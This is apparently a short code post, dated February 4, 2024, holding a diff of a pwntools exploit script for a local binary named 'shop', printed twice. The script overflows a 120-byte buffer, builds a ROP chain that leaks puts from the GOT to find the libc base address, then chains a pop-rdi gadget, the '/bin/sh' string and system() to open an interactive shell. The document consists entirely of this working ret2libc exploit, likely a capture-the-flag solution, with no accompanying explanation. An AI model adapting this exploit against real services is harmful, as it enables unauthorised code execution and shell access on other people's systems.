sharpicx · February 4, 2024 19:40
diff --git a/exploit.py b/exploit.py
 from pwn import *

 context(log_level="DEBUG", os="linux", arch="amd64")
 e = ELF("./shop")
 p = process(e.path)
 r = ROP(e)
 libc = ELF("/usr/lib/libc.so.6")

 offset = 120
 padding = b"A" * offset

 r.raw(padding)
 r.puts(e.got["puts"])
 r.puts(e.plt["puts"])
 r.call(e.symbols["main"])

 print(r.dump())
 p.sendline(r.chain())

 leak_puts = p.recvline_startswith(b"\xf0")
 leak_puts = u64(leak_puts.ljust(8, b"\x00"))

 log.info("puts@GLIBC = {}".format(hex(leak_puts)))
 libc.address = leak_puts - libc.symbols["puts"]

 log.info(f"{hex(libc.address) = }")

 pop_rdi = p64(r.find_gadget(["pop rdi", "ret"])[0])
 bin_sh = p64(next(libc.search(b"/bin/sh")))
 system = p64(libc.symbols["system"])

 payload = padding
 payload += pop_rdi
 payload += bin_sh
 payload += system

 p.sendline(payload)
 p.interactive()
 p.close()
	from pwn import *

	context(log_level="DEBUG", os="linux", arch="amd64")
	e = ELF("./shop")
	p = process(e.path)
	r = ROP(e)
	libc = ELF("/usr/lib/libc.so.6")

	offset = 120
	padding = b"A" * offset

	r.raw(padding)
	r.puts(e.got["puts"])
	r.puts(e.plt["puts"])
	r.call(e.symbols["main"])

	print(r.dump())
	p.sendline(r.chain())

	leak_puts = p.recvline_startswith(b"\xf0")
	leak_puts = u64(leak_puts.ljust(8, b"\x00"))

	log.info("puts@GLIBC = {}".format(hex(leak_puts)))
	libc.address = leak_puts - libc.symbols["puts"]

	log.info(f"{hex(libc.address) = }")

	pop_rdi = p64(r.find_gadget(["pop rdi", "ret"])[0])
	bin_sh = p64(next(libc.search(b"/bin/sh")))
	system = p64(libc.symbols["system"])

	payload = padding
	payload += pop_rdi
	payload += bin_sh
	payload += system

	p.sendline(payload)
	p.interactive()
	p.close()